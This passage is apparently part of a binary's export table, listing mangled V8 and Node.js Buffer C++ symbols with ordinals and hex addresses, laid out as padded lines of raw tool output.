                                                                                                                                                    ?IsFalse@Value@v8@@QEBA_NXZ3980x1401677c0
                                                                                                                                                    ?IsFunction@Value@v8@@QEBA_NXZ3990x140167890
                                                                                                                                                    ?IsGlobalIndependent@V8@v8@@CA_NPEAPEAVObject@internal@2@@Z4000x14015fa20
                                                                                                                                                    ?IsGlobalNearDeath@V8@v8@@CA_NPEAPEAVObject@internal@2@@Z4010x14015faa0
                                                                                                                                                    ?IsGlobalWeak@V8@v8@@CA_NPEAPEAVObject@internal@2@@Z4020x14015fb40
                                                                                                                                                    ?IsIndependent@?$Persistent@VFunctionTemplate@v8@@@v8@@QEBA_NXZ4030x140002d00
                                                                                                                                                    ?IsIndependent@?$Persistent@VObject@v8@@@v8@@QEBA_NXZ4040x140002d00
                                                                                                                                                    ?IsInt32@Value@v8@@QEBA_NXZ4050x140167de0
                                                                                                                                                    ?IsLocked@Locker@v8@@SA_NPEAVIsolate@2@@Z4060x14015cdc0
                                                                                                                                                    ?IsNativeError@Value@v8@@QEBA_NXZ4070x140168480
                                                                                                                                                    ?IsNearDeath@?$Persistent@VFunctionTemplate@v8@@@v8@@QEBA_NXZ4080x140002c80
                                                                                                                                                    ?IsNearDeath@?$Persistent@VObject@v8@@@v8@@QEBA_NXZ4090x140002c80
                                                                                                                                                    ?IsNumber@Value@v8@@QEBA_NXZ4100x140167b80
                                                                                                                                                    ?IsNumberObject@Value@v8@@QEBA_NXZ4110x1401682b0
                                                                                                                                                    ?IsObject@Value@v8@@QEBA_NXZ4120x140167ac0
                                                                                                                                                    ?IsProfilerPaused@V8@v8@@SA_NXZ4130x140179070
                                                                                                                                                    ?IsRegExp@Value@v8@@QEBA_NXZ4140x140168790
                                                                                                                                                    ?IsStringObject@Value@v8@@QEBA_NXZ4150x1401681a0
                                                                                                                                                    ?IsTrue@Value@v8@@QEBA_NXZ4160x1401676f0
                                                                                                                                                    ?IsUint32@Value@v8@@QEBA_NXZ4170x140167f20
                                                                                                                                                    ?IsWeak@?$Persistent@VFunctionTemplate@v8@@@v8@@QEBA_NXZ4180x140002c90
                                                                                                                                                    ?IsWeak@?$Persistent@VObject@v8@@@v8@@QEBA_NXZ4190x140002c90
                                                                                                                                                    ?IsWithinBounds@Buffer@node@@SA_N_K00@Z4200x1400097f0
                                                                                                                                                    ?Leave@HandleScope@v8@@AEAAXXZ4210x14015fd90
                                                                                                                                                    ?Length@Array@v8@@QEBAIXZ4220x140177740
                                                                                                                                                    ?Length@Buffer@node@@SA_KPEAV12@@Z4230x1400097b0
                                                                                                                                                    ?Length@Buffer@node@@SA_KV?$Handle@VValue@v8@@@v8@@@Z4240x140009770
                                                                                                                                                    ?Length@String@v8@@QEBAHXZ4250x140171ce0
                                                                                                                                                    ?LowMemoryNotification@V8@v8@@SAXXZ4260x140173e00
                                                                                                                                                    ?MakeCallback@node@@YA?AV?$Handle@VValue@v8@@@v8@@V?$Handle@VObject@v8@@@3@PEBDHQEAV23@@Z4270x14000bb80
                                                                                                                                                    ?MakeCallback@node@@YA?AV?$Handle@VValue@v8@@@v8@@V?$Handle@VObject@v8@@@3@V?$Handle@VFunction@v8@@@3@HQEAV23@@Z4280x14000b7f0
                                                                                                                                                    ?MakeCallback@node@@YA?AV?$Handle@VValue@v8@@@v8@@V?$Handle@VObject@v8@@@3@V?$Handle@VString@v8@@@3@HQEAV23@@Z4290x14000bab0
                                                                                                                                                    ?MakeExternal@String@v8@@QEAA_NPEAVExternalAsciiStringResource@12@@Z4300x140176200
                                                                                                                                                    ?MakeExternal@String@v8@@QEAA_NPEAVExternalStringResource@12@@Z4310x140175f00
                                                                                                                                                    ?MakeFastBuffer@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z4320x140014b40
                                                                                                                                                    ?MakeWeak@?$Persistent@VFunctionTemplate@v8@@@v8@@QEAAXPEAXP6AXV?$Persistent@VValue@v8@@@2@0@Z@Z4330x140002ce0
                                                                                                                                                    ?MakeWeak@?$Persistent@VObject@v8@@@v8@@QEAAXPEAXP6AXV?$Persistent@VValue@v8@@@2@0@Z@Z4340x140002ce0
                                                                                                                                                    ?MakeWeak@ObjectWrap@node@@IEAAXXZ4350x140001af0
                                                                                                                                                    ?MakeWeak@V8@v8@@CAXPEAPEAVObject@internal@2@PEAXP6AXV?$Persistent@VValue@v8@@@2@1@Z@Z4360x14015f840
                                                                                                                                                    ?MarkAsUndetectable@ObjectTemplate@v8@@QEAAXXZ4370x140162d20
                                                                                                                                                    ?MarkIndependent@?$Persistent@VFunctionTemplate@v8@@@v8@@QEAAXXZ4380x140002c20
                                                                                                                                                    ?MarkIndependent@?$Persistent@VObject@v8@@@v8@@QEAAXXZ4390x140002c20
                                                                                                                                                    ?MarkIndependent@V8@v8@@CAXPEAPEAVObject@internal@2@@Z4400x14015f9c0
                                                                                                                                                    ?MayContainNonAscii@String@v8@@QEBA_NXZ4410x1401720c0
                                                                                                                                                    ?Message@TryCatch@v8@@QEBA?AV?$Local@VMessage@v8@@@2@XZ4420x140164ec0
                                                                                                                                                    ?New@?$Persistent@VFunctionTemplate@v8@@@v8@@SA?AV12@V?$Handle@VFunctionTemplate@v8@@@2@@Z4430x140002cb0
                                                                                                                                                    ?New@?$Persistent@VObject@v8@@@v8@@SA?AV12@V?$Handle@VObject@v8@@@2@@Z4440x140002cb0
                                                                                                                                                    ?New@AccessorSignature@v8@@SA?AV?$Local@VAccessorSignature@v8@@@2@V?$Handle@VFunctionTemplate@v8@@@2@@Z4450x140161040
                                                                                                                                                    ?New@Array@v8@@SA?AV?$Local@VArray@v8@@@2@H@Z4460x140177640
                                                                                                                                                    ?New@BooleanObject@v8@@SA?AV?$Local@VValue@v8@@@2@_N@Z4470x1401767f0
                                                                                                                                                    ?New@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z4480x140013850
                                                                                                                                                    ?New@Buffer@node@@SA?AV?$Handle@VObject@v8@@@v8@@V?$Handle@VString@v8@@@4@@Z4490x140013360
                                                                                                                                                    ?New@Buffer@node@@SAPEAV12@PEAD_KP6AX0PEAX@Z2@Z4500x140013730
                                                                                                                                                    ?New@Buffer@node@@SAPEAV12@PEBD_K@Z4510x140013620
                                                                                                                                                    ?New@Buffer@node@@SAPEAV12@_K@Z4520x140013480
                                                                                                                                                    ?New@Context@v8@@SA?AV?$Persistent@VContext@v8@@@2@PEAVExtensionConfiguration@2@V?$Handle@VObjectTemplate@v8@@@2@V?$Handle@VValue@v8@@@2@@Z4530x140173f80
                                                                                                                                                    ?New@Date@v8@@SA?AV?$Local@VValue@v8@@@2@N@Z4540x140176c40
                                                                                                                                                    ?New@External@v8@@SA?AV?$Local@VExternal@v8@@@2@PEAX@Z4550x140175600
                                                                                                                                                    ?New@FunctionTemplate@v8@@SA?AV?$Local@VFunctionTemplate@v8@@@2@P6A?AV?$Handle@VValue@v8@@@2@AEBVArguments@2@@ZV42@V?$Handle@VSignature@v8@@@2@@Z4560x140160d20
                                                                                                                                                    ?New@Integer@v8@@SA?AV?$Local@VInteger@v8@@@2@H@Z4570x140177c00
                                                                                                                                                    ?New@Integer@v8@@SA?AV?$Local@VInteger@v8@@@2@HPEAVIsolate@2@@Z4580x140177cc0
                                                                                                                                                    ?New@Isolate@v8@@SAPEAV12@XZ4590x1401792a0
                                                                                                                                                    ?New@Number@v8@@SA?AV?$Local@VNumber@v8@@@2@N@Z4600x140177b40
                                                                                                                                                    ?New@NumberObject@v8@@SA?AV?$Local@VValue@v8@@@2@N@Z4610x140176600
                                                                                                                                                    ?New@Object@v8@@SA?AV?$Local@VObject@v8@@@2@XZ4620x1401764e0
                                                                                                                                                    ?New@ObjectTemplate@v8@@CA?AV?$Local@VObjectTemplate@v8@@@2@V?$Handle@VFunctionTemplate@v8@@@2@@Z4630x140162720
                                                                                                                                                    ?New@ObjectTemplate@v8@@SA?AV?$Local@VObjectTemplate@v8@@@2@XZ4640x140162700
                                                                                                                                                    ?New@RegExp@v8@@SA?AV?$Local@VRegExp@v8@@@2@V?$Handle@VString@v8@@@2@W4Flags@12@@Z4650x140177170
                                                                                                                                                    ?New@Script@v8@@SA?AV?$Local@VScript@v8@@@2@V?$Handle@VString@v8@@@2@PEAVScriptOrigin@2@PEAVScriptData@2@0@Z4660x140163a30
                                                                                                                                                    ?New@Script@v8@@SA?AV?$Local@VScript@v8@@@2@V?$Handle@VString@v8@@@2@V?$Handle@VValue@v8@@@2@@Z4670x140163da0
                                                                                                                                                    ?New@ScriptData@v8@@SAPEAV12@PEBDH@Z4680x1401638f0
                                                                                                                                                    ?New@Signature@v8@@SA?AV?$Local@VSignature@v8@@@2@V?$Handle@VFunctionTemplate@v8@@@2@HQEAV42@@Z4690x140160ee0
                                                                                                                                                    ?New@String@v8@@SA?AV?$Local@VString@v8@@@2@PEBDH@Z4700x140175830
                                                                                                                                                    ?New@String@v8@@SA?AV?$Local@VString@v8@@@2@PEBGH@Z4710x140175b90
                                                                                                                                                    ?New@StringObject@v8@@SA?AV?$Local@VValue@v8@@@2@V?$Handle@VString@v8@@@2@@Z4720x140176a20
                                                                                                                                                    ?New@TypeSwitch@v8@@SA?AV?$Local@VTypeSwitch@v8@@@2@HQEAV?$Handle@VFunctionTemplate@v8@@@2@@Z4730x1401610d0
                                                                                                                                                    ?New@TypeSwitch@v8@@SA?AV?$Local@VTypeSwitch@v8@@@2@V?$Handle@VFunctionTemplate@v8@@@2@@Z4740x1401610a0
                                                                                                                                                    ?NewExternal@String@v8@@SA?AV?$Local@VString@v8@@@2@PEAVExternalAsciiStringResource@12@@Z4750x1401760e0
                                                                                                                                                    ?NewExternal@String@v8@@SA?AV?$Local@VString@v8@@@2@PEAVExternalStringResource@12@@Z4760x140175de0
                                                                                                                                                    ?NewFromUnsigned@Integer@v8@@SA?AV?$Local@VInteger@v8@@@2@I@Z4770x140177c60
                                                                                                                                                    ?NewFromUnsigned@Integer@v8@@SA?AV?$Local@VInteger@v8@@@2@IPEAVIsolate@2@@Z4780x140177d90
                                                                                                                                                    ?NewInstance@Function@v8@@QEBA?AV?$Local@VObject@v8@@@2@HQEAV?$Handle@VValue@v8@@@2@@Z4790x140170f60
                                                                                                                                                    ?NewInstance@Function@v8@@QEBA?AV?$Local@VObject@v8@@@2@XZ4800x140170f40
                                                                                                                                                    ?NewInstance@ObjectTemplate@v8@@QEAA?AV?$Local@VObject@v8@@@2@XZ4810x140174e90
                                                                                                                                                    ?NewSymbol@String@v8@@SA?AV?$Local@VString@v8@@@2@PEBDH@Z4820x140177a30
                                                                                                                                                    ?NewUndetectable@String@v8@@SA?AV?$Local@VString@v8@@@2@PEBDH@Z4830x140175a80
                                                                                                                                                    ?NewUndetectable@String@v8@@SA?AV?$Local@VString@v8@@@2@PEBGH@Z4840x140175cc0
                                                                                                                                                    ?Null@v8@@YA?AV?$Handle@VPrimitive@v8@@@1@XZ4850x140052b60
                                                                                                                                                    ?NumberOfHandles@HandleScope@v8@@SAHXZ4860x14015fde0
                                                                                                                                                    ?NumberValue@Date@v8@@QEBANXZ4870x140176d90
                                                                                                                                                    ?NumberValue@NumberObject@v8@@QEBANXZ4880x1401766f0
                                                                                                                                                    ?NumberValue@Value@v8@@QEBANXZ4890x14016a150
                                                                                                                                                    ?ObjectProtoToString@Object@v8@@QEAA?AV?$Local@VString@v8@@@2@XZ4900x14016cfd0
                                                                                                                                                    ?PauseProfiler@V8@v8@@SAXXZ4910x140179030
                                                                                                                                                    ?PreCompile@ScriptData@v8@@SAPEAV12@PEBDH@Z4920x140163700
                                                                                                                                                    ?PreCompile@ScriptData@v8@@SAPEAV12@V?$Handle@VString@v8@@@2@@Z4930x1401637a0
                                                                                                                                                    ?PrepareStressRun@Testing@v8@@SAXH@Z4940x14017d580
                                                                                                                                                    ?PrintCurrentStackTrace@Message@v8@@SAXPEAU_iobuf@@@Z4950x140166550
                                                                                                                                                    ?ProcessDebugMessages@Debug@v8@@SAXXZ4960x140011f70
                                                                                                                                                    ?PrototypeTemplate@FunctionTemplate@v8@@QEAA?AV?$Local@VObjectTemplate@v8@@@2@XZ4970x140160a30
                                                                                                                                                    ?PushHeapObjectsStats@HeapProfiler@v8@@SAIPEAVOutputStream@2@@Z4980x14017d390
                                                                                                                                                    ?RangeError@Exception@v8@@SA?AV?$Local@VValue@v8@@@2@V?$Handle@VString@v8@@@2@@Z4990x1401799b0
                                                                                                                                                    ?RawClose@HandleScope@v8@@AEAAPEAPEAVObject@internal@2@PEAPEAV342@@Z5000x140160330
                                                                                                                                                    ?ReThrow@TryCatch@v8@@QEAA?AV?$Handle@VValue@v8@@@2@XZ5010x140164b80
                                                                                                                                                    ?ReadDoubleBE@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z5020x1400148e0
                                                                                                                                                    ?ReadDoubleLE@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z5030x1400148c0
                                                                                                                                                    ?ReadFloatBE@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z5040x1400148a0
                                                                                                                                                    ?ReadFloatLE@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z5050x140014880
                                                                                                                                                    ?ReadOnlyPrototype@FunctionTemplate@v8@@QEAAXXZ5060x140161db0
                                                                                                                                                    ?ReattachGlobal@Context@v8@@QEAAXV?$Handle@VObject@v8@@@2@@Z5070x140174a70
                                                                                                                                                    ?Ref@ObjectWrap@node@@MEAAXXZ5080x140001b60
                                                                                                                                                    ?ReferenceError@Exception@v8@@SA?AV?$Local@VValue@v8@@@2@V?$Handle@VString@v8@@@2@@Z5090x140179bc0
                                                                                                                                                    ?RegisterExtension@v8@@YAXPEAVExtension@1@@Z5100x14015f470
                                                                                                                                                    ?RemoveCallCompletedCallback@V8@v8@@SAXP6AXXZ@Z5110x140178f60
                                                                                                                                                    ?RemoveGCEpilogueCallback@V8@v8@@SAXP6AXW4GCType@2@W4GCCallbackFlags@2@@Z@Z5120x140178c60
                                                                                                                                                    ?RemoveGCPrologueCallback@V8@v8@@SAXP6AXW4GCType@2@W4GCCallbackFlags@2@@Z@Z5130x140178af0
                                                                                                                                                    ?RemoveMemoryAllocationCallback@V8@v8@@SAXP6AXW4ObjectSpace@2@W4AllocationAction@2@H@Z@Z5140x140178df0
                                                                                                                                                    ?RemoveMessageListeners@V8@v8@@SAXP6AXV?$Handle@VMessage@v8@@@2@V?$Handle@VValue@v8@@@2@@Z@Z5150x140178050
                                                                                                                                                    ?Replace@Buffer@node@@AEAAXPEAD_KP6AX0PEAX@Z2@Z5160x140013a80
                                                                                                                                                    ?Reset@TryCatch@v8@@QEAAXXZ5170x140164f50
                                                                                                                                                    ?ResumeProfiler@V8@v8@@SAXXZ5180x140179050
                                                                                                                                                    ?Run@Script@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ5190x140164060
                                                                                                                                                    ?SendCommand@Debug@v8@@SAXPEBGHPEAVClientData@12@PEAVIsolate@2@@Z5200x14017ac00
                                                                                                                                                    ?Serialize@HeapSnapshot@v8@@QEBAXPEAVOutputStream@2@W4SerializationFormat@12@@Z5210x14017cd50
                                                                                                                                                    ?Set@Object@v8@@QEAA_NIV?$Handle@VValue@v8@@@2@@Z5220x14016b7c0
                                                                                                                                                    ?Set@Object@v8@@QEAA_NV?$Handle@VValue@v8@@@2@0W4PropertyAttribute@2@@Z5230x14016b540
                                                                                                                                                    ?Set@Template@v8@@QEAAXPEBDV?$Handle@VData@v8@@@2@@Z5240x1400018d0
                                                                                                                                                    ?Set@Template@v8@@QEAAXV?$Handle@VString@v8@@@2@V?$Handle@VData@v8@@@2@W4PropertyAttribute@2@@Z5250x140160760
                                                                                                                                                    ?SetAbortOnUncaughtException@Isolate@v8@@QEAAXP6A_NXZ@Z5260x140179350
                                                                                                                                                    ?SetAccessCheckCallbacks@ObjectTemplate@v8@@QEAAXP6A_NV?$Local@VObject@v8@@@2@V?$Local@VValue@v8@@@2@W4AccessType@2@1@ZP6A_N0I21@ZV?$Handle@VValue@v8@@@2@_N@Z5270x140162eb0
                                                                                                                                                    ?SetAccessor@Object@v8@@QEAA_NV?$Handle@VString@v8@@@2@P6A?AV?$Handle@VValue@v8@@@2@V?$Local@VString@v8@@@2@AEBVAccessorInfo@2@@ZP6AX1V?$Local@VValue@v8@@@2@2@ZV42@W4AccessControl@2@W4PropertyAttribute@2@@Z5280x14016dbb0
                                                                                                                                                    ?SetAccessor@ObjectTemplate@v8@@QEAAXV?$Handle@VString@v8@@@2@P6A?AV?$Handle@VValue@v8@@@2@V?$Local@VString@v8@@@2@AEBVAccessorInfo@2@@ZP6AX1V?$Local@VValue@v8@@@2@2@ZV42@W4AccessControl@2@W4PropertyAttribute@2@V?$Handle@VAccessorSignature@v8@@@2@@Z5290x140162960
                                                                                                                                                    ?SetAddHistogramSampleFunction@V8@v8@@SAXP6AXPEAXH@Z@Z5300x140178560
                                                                                                                                                    ?SetAllowCodeGenerationFromStringsCallback@V8@v8@@SAXP6A_NV?$Local@VContext@v8@@@2@@Z@Z5310x14015f2a0
                                                                                                                                                    ?SetCallAsFunctionHandler@ObjectTemplate@v8@@QEAAXP6A?AV?$Handle@VValue@v8@@@2@AEBVArguments@2@@ZV32@@Z5320x140163340
                                                                                                                                                    ?SetCallHandler@FunctionTemplate@v8@@QEAAXP6A?AV?$Handle@VValue@v8@@@2@AEBVArguments@2@@ZV32@@Z5330x140161370
                                                                                                                                                    ?SetCaptureMessage@TryCatch@v8@@QEAAX_N@Z5340x140164f80
                                                                                                                                                    ?SetCaptureStackTraceForUncaughtExceptions@V8@v8@@SAX_NHW4StackTraceOptions@StackTrace@2@@Z5350x1401782c0
                                                                                                                                                    ?SetClassName@FunctionTemplate@v8@@QEAAXV?$Handle@VString@v8@@@2@@Z5360x140161b80
                                                                                                                                                    ?SetCounterFunction@V8@v8@@SAXP6APEAHPEBD@Z@Z5370x140178310
                                                                                                                                                    ?SetCreateHistogramFunction@V8@v8@@SAXP6APEAXPEBDHH_K@Z@Z5380x1401783d0
                                                                                                                                                    ?SetData@Context@v8@@QEAAXV?$Handle@VValue@v8@@@2@@Z5390x140160120
                                                                                                                                                    ?SetData@Isolate@v8@@QEAAXPEAX@Z5400x1400019a0
                                                                                                                                                    ?SetData@Script@v8@@QEAAXV?$Handle@VString@v8@@@2@@Z5410x140164810
                                                                                                                                                    ?SetDebugEventListener2@Debug@v8@@SA_NP6AXAEBVEventDetails@12@@ZV?$Handle@VValue@v8@@@2@@Z5420x14017a640
                                                                                                                                                    ?SetDebugEventListener@Debug@v8@@SA_NP6AXW4DebugEvent@2@V?$Handle@VObject@v8@@@2@1V?$Handle@VValue@v8@@@2@@Z2@Z5430x14017a4a0
                                                                                                                                                    ?SetDebugEventListener@Debug@v8@@SA_NV?$Handle@VObject@v8@@@2@V?$Handle@VValue@v8@@@2@@Z5440x14017a7e0
                                                                                                                                                    ?SetDebugMessageDispatchHandler@Debug@v8@@SAXP6AXXZ_N@Z5450x14017ad40
                                                                                                                                                    ?SetDecompressedStartupData@V8@v8@@SAXPEAVStartupData@2@@Z5460x140368010
                                                                                                                                                    ?SetEntropySource@V8@v8@@SAXP6A_NPEAE_K@Z@Z5470x1401739f0
                                                                                                                                                    ?SetErrno@node@@YAXUuv_err_s@@@Z5480x14000bc50
                                                                                                                                                    ?SetErrorMessageForCodeGenerationFromStrings@Context@v8@@QEAAXV?$Handle@VString@v8@@@2@@Z5490x140174d60
                                                                                                                                                    ?SetFailedAccessCheckCallbackFunction@V8@v8@@SAXP6AXV?$Local@VObject@v8@@@2@W4AccessType@2@V?$Local@VValue@v8@@@2@@Z@Z5500x140178710
                                                                                                                                                    ?SetFatalErrorHandler@V8@v8@@SAXP6AXPEBD0@Z@Z5510x14015f240
                                                                                                                                                    ?SetFlagsFromCommandLine@V8@v8@@SAXPEAHPEAPEAD_N@Z5520x14015f310
                                                                                                                                                    ?SetFlagsFromString@V8@v8@@SAXPEBDH@Z5530x14015f300
                                                                                                                                                    ?SetFunctionEntryHook@V8@v8@@SA_NP6AX_K0@Z@Z5540x140173a10
                                                                                                                                                    ?SetGlobalGCEpilogueCallback@V8@v8@@SAXP6AXXZ@Z5550x1401789e0
                                                                                                                                                    ?SetGlobalGCPrologueCallback@V8@v8@@SAXP6AXXZ@Z5560x140178960
                                                                                                                                                    ?SetHiddenPrototype@FunctionTemplate@v8@@QEAAX_N@Z5570x140161cb0
                                                                                                                                                    ?SetHiddenValue@Object@v8@@QEAA_NV?$Handle@VString@v8@@@2@V?$Handle@VValue@v8@@@2@@Z5580x14016f170
                                                                                                                                                    ?SetHostDispatchHandler@Debug@v8@@SAXP6AXXZH@Z5590x14017ac90
                                                                                                                                                    ?SetIndexedInstancePropertyHandler@FunctionTemplate@v8@@AEAAXP6A?AV?$Handle@VValue@v8@@@2@IAEBVAccessorInfo@2@@ZP6A?AV32@IV?$Local@VValue@v8@@@2@0@ZP6A?AV?$Handle@VInteger@v8@@@2@I0@ZP6A?AV?$Handle@VBoolean@v8@@@2@I0@ZP6A?AV?$Handle@VArray@v8@@@2@0@ZV32@@Z5600x1401621c0
                                                                                                                                                    ?SetIndexedPropertiesToExternalArrayData@Object@v8@@QEAAXPEAXW4ExternalArrayType@2@H@Z5610x14016fdf0
                                                                                                                                                    ?SetIndexedPropertiesToPixelData@Object@v8@@QEAAXPEAEH@Z5620x14016f910
                                                                                                                                                    ?SetIndexedPropertyHandler@ObjectTemplate@v8@@QEAAXP6A?AV?$Handle@VValue@v8@@@2@IAEBVAccessorInfo@2@@ZP6A?AV32@IV?$Local@VValue@v8@@@2@0@ZP6A?AV?$Handle@VInteger@v8@@@2@I0@ZP6A?AV?$Handle@VBoolean@v8@@@2@I0@ZP6A?AV?$Handle@VArray@v8@@@2@0@ZV32@@Z5630x140163160
                                                                                                                                                    ?SetInstanceCallAsFunctionHandler@FunctionTemplate@v8@@AEAAXP6A?AV?$Handle@VValue@v8@@@2@AEBVArguments@2@@ZV32@@Z5640x1401624f0
                                                                                                                                                    ?SetInternalField@Object@v8@@QEAAXHV?$Handle@VValue@v8@@@2@@Z5650x1401736c0
                                                                                                                                                    ?SetInternalFieldCount@ObjectTemplate@v8@@QEAAXH@Z5660x140163590
                                                                                                                                                    ?SetJitCodeEventHandler@V8@v8@@SAXW4JitCodeEventOptions@2@P6AXPEBUJitCodeEvent@2@@Z@Z5670x140173a30
                                                                                                                                                    ?SetLiveEditEnabled@Debug@v8@@SAX_NPEAVIsolate@2@@Z5680x14017b370
                                                                                                                                                    ?SetMessageHandler2@Debug@v8@@SAXP6AXAEBVMessage@12@@Z@Z5690x14017ab60
                                                                                                                                                    ?SetMessageHandler@Debug@v8@@SAXP6AXPEBGHPEAVClientData@12@@Z_N@Z5700x14017aa70
                                                                                                                                                    ?SetName@Function@v8@@QEAAXV?$Handle@VString@v8@@@2@@Z5710x140171670
                                                                                                                                                    ?SetNamedInstancePropertyHandler@FunctionTemplate@v8@@AEAAXP6A?AV?$Handle@VValue@v8@@@2@V?$Local@VString@v8@@@2@AEBVAccessorInfo@2@@ZP6A?AV32@0V?$Local@VValue@v8@@@2@1@ZP6A?AV?$Handle@VInteger@v8@@@2@01@ZP6A?AV?$Handle@VBoolean@v8@@@2@01@ZP6A?AV?$Handle@VArray@v8@@@2@1@ZV32@@Z5720x140161e90
                                                                                                                                                    ?SetNamedPropertyHandler@ObjectTemplate@v8@@QEAAXP6A?AV?$Handle@VValue@v8@@@2@V?$Local@VString@v8@@@2@AEBVAccessorInfo@2@@ZP6A?AV32@0V?$Local@VValue@v8@@@2@1@ZP6A?AV?$Handle@VInteger@v8@@@2@01@ZP6A?AV?$Handle@VBoolean@v8@@@2@01@ZP6A?AV?$Handle@VArray@v8@@@2@1@ZV32@@Z5730x140162b40
                                                                                                                                                    ?SetPointerInInternalField@Object@v8@@QEAAXHPEAX@Z5740x140173870
                                                                                                                                                    ?SetPrototype@Object@v8@@QEAA_NV?$Handle@VValue@v8@@@2@@Z5750x14016c6c0
                                                                                                                                                    ?SetResourceConstraints@v8@@YA_NPEAVResourceConstraints@1@@Z5760x14015f6a0
                                                                                                                                                    ?SetReturnAddressLocationResolver@V8@v8@@SAXP6A_K_K@Z@Z5770x140173a00
                                                                                                                                                    ?SetSecurityToken@Context@v8@@QEAAXV?$Handle@VValue@v8@@@2@@Z5780x1401742f0
                                                                                                                                                    ?SetStressRunType@Testing@v8@@SAXW4StressType@12@@Z5790x14017d550
                                                                                                                                                    ?SetVerbose@TryCatch@v8@@QEAAX_N@Z5800x140164f70
                                                                                                                                                    ?SetWrapperClassId@?$Persistent@VFunctionTemplate@v8@@@v8@@QEAAXG@Z5810x140002ca0
                                                                                                                                                    ?SetWrapperClassId@?$Persistent@VObject@v8@@@v8@@QEAAXG@Z5820x140002ca0
                                                                                                                                                    ?SetWrapperClassId@V8@v8@@CAXPEAPEAVObject@internal@2@G@Z5830x140174e70
                                                                                                                                                    ?SlowGetPointerFromInternalField@Object@v8@@AEAAPEAXH@Z5840x140175480
                                                                                                                                                    ?StackTrace@TryCatch@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ5850x140164ca0
                                                                                                                                                    ?Start@node@@YAHHQEAPEAD@Z5860x140012f50
                                                                                                                                                    ?StartHeapObjectsTracking@HeapProfiler@v8@@SAXXZ5870x14017d270
                                                                                                                                                    ?StartPreemption@Locker@v8@@SAXH@Z5880x14015cf50
                                                                                                                                                    ?StartProfiling@CpuProfiler@v8@@SAXV?$Handle@VString@v8@@@2@@Z5890x14017bf30
                                                                                                                                                    ?StopHeapObjectsTracking@HeapProfiler@v8@@SAXXZ5900x14017d2f0
                                                                                                                                                    ?StopPreemption@Locker@v8@@SAXXZ5910x14015cf60
                                                                                                                                                    ?StopProfiling@CpuProfiler@v8@@SAPEBVCpuProfile@2@V?$Handle@VString@v8@@@2@V?$Handle@VValue@v8@@@2@@Z5920x14017c020
                                                                                                                                                    ?StrictEquals@Value@v8@@QEBA_NV?$Handle@VValue@v8@@@2@@Z5930x14016afd0
                                                                                                                                                    ?StringValue@StringObject@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ5940x140176b10
                                                                                                                                                    ?SyntaxError@Exception@v8@@SA?AV?$Local@VValue@v8@@@2@V?$Handle@VString@v8@@@2@@Z5950x140179dd0
                                                                                                                                                    ?TakeSnapshot@HeapProfiler@v8@@SAPEBVHeapSnapshot@2@V?$Handle@VString@v8@@@2@W4Type@32@PEAVActivityControl@2@@Z5960x14017d190
                                                                                                                                                    ?TerminateExecution@V8@v8@@SAXH@Z5970x1401790e0
                                                                                                                                                    ?TerminateExecution@V8@v8@@SAXPEAVIsolate@2@@Z5980x140179220
                                                                                                                                                    ?This@AccessorInfo@v8@@QEBA?AV?$Local@VObject@v8@@@2@XZ5990x140001980
                                                                                                                                                    ?ThrowException@v8@@YA?AV?$Handle@VValue@v8@@@1@V21@@Z6000x14015f320
                                                                                                                                                    ?ToArrayIndex@Value@v8@@QEBA?AV?$Local@VUint32@v8@@@2@XZ6010x14016a8c0
                                                                                                                                                    ?ToBoolean@Value@v8@@QEBA?AV?$Local@VBoolean@v8@@@2@XZ6020x140168dc0
                                                                                                                                                    ?ToDetailString@Value@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ6030x140168a20
                                                                                                                                                    ?ToInt32@Value@v8@@QEBA?AV?$Local@VInt32@v8@@@2@XZ6040x14016a540
                                                                                                                                                    ?ToInteger@Value@v8@@QEBA?AV?$Local@VInteger@v8@@@2@XZ6050x140169130
                                                                                                                                                    ?ToNumber@Value@v8@@QEBA?AV?$Local@VNumber@v8@@@2@XZ6060x140168f50
                                                                                                                                                    ?ToObject@Value@v8@@QEBA?AV?$Local@VObject@v8@@@2@XZ6070x140168bf0
                                                                                                                                                    ?ToString@Value@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ6080x140168850
                                                                                                                                                    ?ToUint32@Value@v8@@QEBA?AV?$Local@VUint32@v8@@@2@XZ6090x14016a700
                                                                                                                                                    ?True@v8@@YA?AV?$Handle@VBoolean@v8@@@1@XZ6100x14015f5d0
                                                                                                                                                    ?TurnOnAccessCheck@Object@v8@@QEAAXXZ6110x14016e9e0
                                                                                                                                                    ?TypeError@Exception@v8@@SA?AV?$Local@VValue@v8@@@2@V?$Handle@VString@v8@@@2@@Z6120x140179fe0
                                                                                                                                                    ?UVException@node@@YA?AV?$Local@VValue@v8@@@v8@@HPEBD00@Z6130x14000a600
                                                                                                                                                    ?Ucs2Slice@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z6140x140013d10
                                                                                                                                                    ?Ucs2Write@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z6150x140014820
                                                                                                                                                    ?Uint32Value@Value@v8@@QEBAIXZ6160x14016b320
                                                                                                                                                    ?Undefined@v8@@YA?AV?$Handle@VPrimitive@v8@@@1@XZ6170x14015f570
                                                                                                                                                    ?Unref@ObjectWrap@node@@MEAAXXZ6180x140001ba0
                                                                                                                                                    ?UseDefaultSecurityToken@Context@v8@@QEAAXXZ6190x140174420
                                                                                                                                                    ?Utf8Length@String@v8@@QEBAHXZ6200x140171d90
                                                                                                                                                    ?Utf8Slice@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z6210x140013cf0
                                                                                                                                                    ?Utf8Write@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z6220x140014800
                                                                                                                                                    ?Value@Boolean@v8@@QEBA_NXZ6230x1401730e0
                                                                                                                                                    ?Value@External@v8@@QEBAPEAXXZ6240x1401756f0
